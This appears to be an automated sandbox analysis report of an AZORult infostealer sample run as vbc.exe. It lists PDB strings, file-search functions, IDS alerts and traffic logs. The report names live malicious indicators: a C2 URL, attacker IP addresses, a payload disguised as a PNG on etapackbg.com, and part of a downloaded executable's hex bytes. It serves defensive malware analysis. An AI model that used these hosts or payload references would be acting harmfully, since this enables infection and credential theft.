              Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635922256.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.635239654.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: vbc.exe, 00000009.00000003.651566278.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.652579331.0000000004284000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.653758258.000000000426C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: vbc.exe, 00000009.00000003.648741288.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.647892915.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: protobuf-net.pdbSHA256 source: vbc.exe, 00000004.00000002.604891788.0000000000E60000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.608049872.0000000003483000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000004.00000002.607033085.0000000003361000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdb source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658024434.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658085566.0000000000304000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: ucrtbase.pdbUGP source: vbc.exe, 00000009.00000003.663041050.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.661124964.0000000003430000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: vbc.exe, 00000009.00000003.643422773.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.642836156.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670824490.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654985743.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655462519.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637461851.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637012145.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641564050.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.641491323.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: vbc.exe, 00000009.00000003.633947571.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670283394.0000000004C20000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670321652.0000000004C24000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.646924205.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.647892915.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668368353.0000000004BE0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639832040.000000000425C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670503638.0000000004C48000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651029417.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670527843.0000000004C4C000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660270812.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.660241054.0000000004290000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: vbc.exe, 00000009.00000003.642227759.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.642836156.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: vbc.exe, 00000009.00000003.640776400.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: vcruntime140.i386.pdb source: vbc.exe, 00000009.00000003.667949909.0000000003310000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671847447.000000000423C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671483646.0000000004104000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668042331.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671690389.0000000004124000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: vbc.exe, 00000009.00000003.651495835.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.652652345.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651029417.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.651522611.0000000004258000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670824490.0000000004C84000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670867303.0000000004C88000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655968619.000000000425C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.655462519.0000000004258000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: vbc.exe, 00000009.00000003.643422773.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.643952487.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: vbc.exe, 00000009.00000003.669966606.0000000004C18000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669869061.0000000004C14000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670084410.0000000004C1C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669824164.0000000004C0C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: vbc.exe, 00000009.00000003.659672132.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.659698452.0000000004254000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671456850.00000000040E8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671089018.0000000003FB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.671329778.0000000003FB8000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: msvcp140.i386.pdbGCTL source: vbc.exe, 00000009.00000003.671255777.0000000003F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670982811.0000000003F2C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676507583.0000000004400000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658024434.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.658085566.0000000000304000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: vbc.exe, 00000009.00000003.644622342.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669530663.0000000004BFC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669494753.0000000004BF8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669037619.0000000004BF4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.643952487.0000000004268000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669615990.0000000004C04000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669572778.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.669789751.0000000004C08000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668427612.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: vbc.exe, 00000009.00000003.668106753.0000000004BB4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668134020.0000000004BB8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.637012145.0000000004264000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668076743.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668160871.0000000004BBC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668189443.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.636520930.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668238482.0000000004BC4000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639375514.0000000004274000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668341274.0000000004BDC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.639342303.0000000004270000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: vbc.exe, 00000009.00000003.668313210.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668284155.0000000004BD4000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.668256853.0000000004BD0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.638371506.000000000426C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670394280.0000000004C30000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670466490.0000000004C38000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670487269.0000000004C3C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670421304.0000000004C34000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: vbc.exe, 00000009.00000003.670671423.0000000004C5C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.654923829.0000000004260000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670627117.0000000004C58000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670800278.0000000004C80000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670709418.0000000004C70000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670765863.0000000004C78000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.670737148.0000000004C74000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.676408565.0000000004318000.00000004.00000800.00020000.00000000.sdmp
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004098A0 FindFirstFileW,FindNextFileW,FindClose,9_2_004098A0
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408D44 FindFirstFileW,GetFileAttributesW,FindNextFileW,9_2_00408D44
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0041303C FindFirstFileW,FindNextFileW,FindClose,9_2_0041303C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0040989F FindFirstFileW,FindNextFileW,FindClose,9_2_0040989F
              Source: C:\Users\Public\vbc.exeCode function: 9_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,9_2_004111C4
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,9_2_00414408
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,9_2_00414408
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00408D3C FindFirstFileW,GetFileAttributesW,FindNextFileW,9_2_00408D3C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,9_2_00412D70
              Source: C:\Users\Public\vbc.exeCode function: 9_2_0041158C FindFirstFileW,FindNextFileW,FindClose,9_2_0041158C
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00411590 FindFirstFileW,FindNextFileW,FindClose,9_2_00411590
              Source: C:\Users\Public\vbc.exeCode function: 9_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,9_2_00412D9C
              Source: global trafficDNS query: name: etapackbg.com
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.218.119:80
              Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.210.218.119:80
              Source: excel.exeMemory has grown: Private usage: 4MB later: 62MB

              Networking

              barindex
              Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
              Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49167 -> 80.66.64.174:80
              Source: TrafficSnort IDS: 2029138 ET TROJAN AZORult v3.3 Server Response M3 80.66.64.174:80 -> 192.168.2.22:49167
              Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49169 -> 80.66.64.174:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://clamprite.ga/azo01/index.php
              Source: Joe Sandbox ViewASN Name: VAD-SRL-AS1MD VAD-SRL-AS1MD
              Source: global trafficHTTP traffic detected: GET /css/Sngggz.png HTTP/1.1Host: etapackbg.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 26 Feb 2022 08:30:05 GMTServer: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27Last-Modified: Fri, 26 Nov 2021 11:12:31 GMTETag: "30000-5d1af2ad7b20b"Accept-Ranges: bytesContent-Length: 196608Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4b 5f 14 99 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 38 00 00 00 c6 02 00 00 00 00 00 2e 56 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e0 55 00 00 4b 00 00 00 00 60 00 00 80 c2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 36 00 00 00 20 00 00 00 38 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 80 c2 02 00 00 60 00 00 00 c4 02 00 00 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 03 00 00 02 00 00 00 fe 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 